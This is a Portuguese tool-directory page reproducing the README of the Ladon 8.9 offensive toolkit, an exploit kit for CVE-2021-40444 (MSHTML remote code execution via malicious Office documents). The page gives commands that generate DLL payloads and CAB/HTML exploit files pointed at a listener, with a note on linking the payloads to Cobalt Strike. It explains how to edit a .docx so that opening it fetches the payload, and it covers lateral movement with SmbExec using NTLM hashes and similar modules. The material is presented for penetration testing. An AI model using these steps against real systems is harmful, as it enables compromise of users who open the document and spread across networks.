Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/k8gege/cve-2021-40444
Geração de PayloadsExploraçãoMovimento LateralExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubk8gege/cve-2021-40444

CVE-2021-40444

Kit de ferramentas de exploit para CVE-2021-40444 MSHTML execução remota de código, apresentando geração de payload DLL, criação de documentos Office e módulos de movimento lateral (SmbExec, WmiExec) para testes de penetração.

Ver Repositório
2264há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

〖EXP〗Ladon CVE-2021-40444 Reprodução da Vulnerabilidade do Office

Resumo da Vulnerabilidade

Em 8 de setembro, horário de Pequim, o CERT da NSFOCUS monitorou a Microsoft emitindo um aviso de segurança sobre a vulnerabilidade de execução remota de código no Microsoft MSHTML. Os atacantes podem criar controles ActiveX maliciosos para uso em documentos do Microsoft Office que utilizam o mecanismo de renderização do navegador. Ao induzir o usuário a abrir o documento malicioso, é possível executar código arbitrário no sistema alvo com as permissões desse usuário. A Microsoft informou no aviso que já detectou exploração ativa desta vulnerabilidade e pede que os usuários relevantes tomem medidas de proteção.

MSHTML (também conhecido como Trident) é o mecanismo do navegador Internet Explorer da Microsoft, também usado em aplicativos do Office para renderizar conteúdo hospedado na Web em documentos do Word, Excel ou PowerPoint. Controles ActiveX são produtos da arquitetura COM da Microsoft, amplamente utilizados no pacote Office do Windows e no navegador IE. Através de controles ActiveX, é possível interagir com o componente MSHTML.

Versões Afetadas

Inclui Windows 7/8/8.1/10, Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022

Novidades da Atualização Ladon8.9

Ladon 8.9 2021.9.14 [+] CVE-2021-40444 Vulnerabilidade de execução remota de código no Microsoft MSHTML, módulo de exploração em documentos do Office Versões afetadas: Windows 7/8/8.1/10, Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022 [+] CmdDll cmd para DLL (payload de execução de comando DLL para vulnerabilidades 0-day do Windows, pode ser usado diretamente com PowerShell para conectar ao CobaltStrike) Vulnerabilidades de estouro como MS17010, escalonamento de privilégio local CVE-2021-1675, etc. Não-estouro como a mais recente vulnerabilidade do Office CVE-2021-40444, etc.

Ladon 8.8 2021.911 [+] SmbExec NTLM-HASH execução não interativa sem retorno [u] GetInfo Nova detecção de informações de VM da VMware [u] OsScan Nova detecção de roteador Vigor [u] Nova detecção de máquinas virtuais Xen\VBOX\Hybrid\Parallels [+] GetInfo Novo cmdkey, RrpLog, drivers instalados, lista de software, arquivos acessados recentemente, etc. [+] GetInfo Novo GUID, CPUID, ID do disco, detecção de backdoor de inicialização automática (DLL, registro, etc.) [+] GetInfo2 Nova obtenção de informações de patches via WMI [+] Informações padrão: novo destaque se espaço livre na unidade C for menor que 2 GB

Uso do Módulo ladon8.9

Uso do CmdDLL

root@kitploit:~
Usage:
Ladon CmdDll x86 calc
Ladon CmdDll x64 calc
Ladon CmdDll b64x86 YwBhAGwAYwA=
Ladon CmdDll b64x64 YwBhAGwAYwA=

Gere o DLL com o comando CMD adequado para sua necessidade. O exemplo abre a calculadora.

Uso do CVE-2021-40444

root@kitploit:~
Usage:
Ladon CVE-2021-40444 MakeCab poc.dll
Ladon CVE-2021-40444 MakeHtml http://192.168.1.8

PS: Este módulo requer o uso de Ladon40.exe

Reprodução do CVE-2021-40444

Ambiente de Teste

Win10 x64 Office 2019

Instalação do Office 2019

Qualquer versão de teste serve, não precisa ativar. Se o arquivo baixado for IMG, renomeie para ZIP e extraia para instalar.

Gerar DLL com CmdDll

CVE-2021-40444 MakeCab converter DLL em CAB

Como o alvo é um sistema Win10 X64, usamos DLL de 64 bits. Comando: Ladon CVE-2021-40444 MakeCab sc64.dll

CVE-2021-40444 MakeHtml gerar Poc.html

Gere o HTML. A URL deve apontar para o endereço onde o Ladon está escutando.

Iniciar o web listener

Modificação da amostra .doc

A amostra foi enviada no pequeno círculo (K8小密圈) no dia 10 de setembro. Renomeie a extensão .docx para .cab ou .zip para editar o arquivo .rels, aponte para o endereço onde o Ladon escuta (poc.html), salve e renomeie novamente para .docx.

GIF de teste

Ao executar o arquivo .doc no Windows 10, o Ladon monitora todo o processo de requisição. O docx primeiro acessa o html, depois a vulnerabilidade carrega o arquivo CAB que empacotamos, executa o INF via CPL, carrega nossa DLL, que no exemplo abre a calculadora.

Uso do SmbExec

root@kitploit:~
Load SmbExec
Usage:
Ladon SmbExec host user pass cmd whoami
Ladon SmbExec host user pass b64cmd dwBoAG8AYQBtAGkA

Execução do SmbExec

Ao executar o SmbExec no shell do Cobalt Strike com parâmetros que contêm espaços e aspas, a codificação de escape do CS pode causar problemas. Usar comandos CMD normais é complicado, por isso adicionei o parâmetro b64cmd para facilitar o uso no CS (este método foi usado no BypassUac há alguns meses, e muitos se perguntam por que não usar comandos CMD diretamente, mas quando o comando CMD contém muitos escapes, a conversão de escape CS -> CMD é trabalhosa). O comando b64cmd pode ser gerado com o LadonGUI versão 8.2 ou superior, usando a codificação Base64Unicode.

Resultado da Execução

Outros Módulos de Movimento Lateral do Ladon

IDNome do MóduloDescriçãoUso
1WmiExecExecuta comandos na porta 135http://k8gege.org/Ladon/WinShell.html
2PsExecExecuta comandos na porta 445http://k8gege.org/Ladon/WinShell.html
3AtExecExecuta comandos na porta 445http://k8gege.org/Ladon/WinShell.html
4SshExecExecuta comandos na porta 22http://k8gege.org/Ladon/WinShell.html
5JspShellExecuta comandos com uma linha JSPhttp://k8gege.org/p/ladon_cs_shell.html
6WebShellExecuta comandos via WebShellhttp://k8gege.org/Ladon/webshell.html
7WinrmExecExecuta comandos na porta 5895http://k8gege.org/Ladon/WinrmExec.html
8SmbExecExecuta comandos na porta 445 usando HASHhttp://k8gege.org/Ladon/SmbExec.html

Download do Ladon

PowerLadon: https://github.com/k8gege/PowerLadon Versões anteriores: http://github.com/k8gege/Ladon/releases Versão 7.0: http://k8gege.org/Download Versão 8.9: K8小密圈

Baixar ferramenta